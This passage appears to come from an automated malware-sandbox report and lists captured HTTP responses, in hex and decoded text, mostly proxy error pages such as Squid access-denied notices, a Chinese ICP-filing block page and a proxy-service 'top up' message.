3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:48 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:48 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:38 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:49 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:49 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3978X-Squid-Error: ERR_CANNOT_FORWARD 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 